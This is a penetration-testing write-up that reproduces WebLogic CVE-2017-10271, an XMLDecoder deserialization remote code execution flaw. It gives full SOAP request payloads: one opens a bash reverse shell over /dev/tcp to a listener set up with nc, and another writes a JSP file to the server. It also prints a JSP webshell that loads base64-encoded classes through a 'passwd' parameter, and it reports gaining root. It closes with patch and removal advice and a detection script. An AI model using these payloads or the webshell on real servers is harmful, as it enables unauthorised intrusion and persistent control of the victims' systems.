WebLogic RCE CVE-2017-10271

Cause

WebLogic's WLS Security component exposes a web service that uses XMLDecoder to parse user-supplied XML. A deserialization vulnerability arises while that XML is parsed, allowing arbitrary command execution.
Affected versions

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.1.0
WebLogic 12.2.1.2.0
Reproduction

Visit port 7001:

Error 404--Not Found
From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
10.4.5 404 Not Found
The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. If the server does not wish to make this information available to the client, the status code 403 (Forbidden) can be used instead. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address.
Preliminary check

Visit ip:7001/wls-wsat/CoordinatorPortType11

If the page shown above appears, the vulnerability may be present.

Other usable URLs:

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
Listening with nc, constructing a POST request to test, reverse shell

Start nc listening on a VPS:
nc -lvp 21
Constructing the POST request:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 靶机:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 635

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/监听端口的ip/21 0>&1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
The reverse-shell command here must be HTML-encoded, otherwise the payload causes a format error when it is parsed.

Visit: http://your-ip:7001/bea_wls_internal/test.jsp

PoC for writing a webshell: it writes the file servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.txt. The file name is xxxx and the file content is xxxx. After the request is sent successfully the server returns a 500 status code. Note that the request must carry the header Content-Type: text/xml, otherwise it fails.

The reverse shell succeeded and obtained root privileges.

Writing a one-line webshell

Construct:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 靶机ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println"><string>
            <![CDATA[
              <% out.print("test"); %>
            ]]>
          </string>
          </void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

But at first the request did not succeed when sent from Burp.

Visit ip:7001/bea_wls_internal/test.jsp

Constructing a JSP one-line shell:
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }

    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
Connection password: passwd

Connection path: /bea_wls_internal/ma.jsp

Fix

Download the relevant patch: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

Depending on the actual environment path, delete WebLogic's wls-wsat component; after deleting the relevant files, restart WebLogic and make sure that accessing wls-wsat/ returns a 404 error.
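As a detection-side complement to the fix above, here is an added example (not from the original post or from any tool it mentions) that inspects a raw HTTP request for the pattern shared by both payloads on this page: a work:WorkContext header carrying a java.beans.XMLDecoder element, plus the classes that element would instantiate. The two sample requests are constructed and the host name is a placeholder.

```python
import re
from typing import Dict, List

# Endpoints listed above that hand the SOAP header to XMLDecoder.
WLS_WSAT_PATHS = {"/wls-wsat/" + p for p in (
    "CoordinatorPortType", "RegistrationPortTypeRPC", "ParticipantPortType",
    "RegistrationRequesterPortType", "CoordinatorPortType11",
    "RegistrationPortTypeRPC11", "ParticipantPortType11",
    "RegistrationRequesterPortType11")}
# Classes behind the two payload kinds on this page (command execution, file
# write) plus close relatives; a WorkContext header never legitimately names them.
DANGEROUS_CLASSES = ("java.lang.ProcessBuilder", "java.lang.Runtime",
                     "java.io.PrintWriter", "java.io.FileOutputStream")
WORKCTX = re.compile(r"<work:WorkContext\b.*?</work:WorkContext>", re.S | re.I)

def inspect_request(raw: str) -> Dict:
    """Parse one raw HTTP/1.1 request and report whether its WorkContext header
    carries an XMLDecoder payload and which dangerous classes it would build."""
    head, _, body = raw.partition("\r\n\r\n")
    path = head.split("\r\n")[0].split(" ")[1].split("?", 1)[0]
    reasons: List[str] = []
    classes: List[str] = []
    if path in WLS_WSAT_PATHS:
        reasons.append("wls-wsat endpoint")
    # Regex instead of an XML parser: a payload that is not well-formed XML
    # (an unencoded '>&' in the command) must still be caught.
    ctx = WORKCTX.search(body)
    decoder = bool(ctx and 'class="java.beans.XMLDecoder"' in ctx.group(0))
    if decoder:
        reasons.append("XMLDecoder inside WorkContext header")
        classes = [c for c in DANGEROUS_CLASSES if c in ctx.group(0)]
    return {"path": path, "suspicious": decoder, "reasons": reasons,
            "classes": classes}

# Constructed sample requests (not captured traffic); "target" is a placeholder.
ENVELOPE = ('<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/'
            'envelope/"><soapenv:Header>%s</soapenv:Header><soapenv:Body/></soapenv:Envelope>')
HEAD = "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: target:7001\r\nContent-Type: text/xml\r\n\r\n"
RCE_SAMPLE = HEAD + ENVELOPE % (
    '<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
    '<java version="1.4.0" class="java.beans.XMLDecoder">'
    '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">'
    '<void index="0"><string>id</string></void></array><void method="start"/></void>'
    '</java></work:WorkContext>')
BENIGN_SAMPLE = HEAD + ENVELOPE % ""

if __name__ == "__main__":
    for sample in (RCE_SAMPLE, BENIGN_SAMPLE):
        print(inspect_request(sample))
```

The same function can be run over request bodies logged by a reverse proxy in front of port 7001 to confirm, after the wls-wsat removal, that any remaining hits are being rejected.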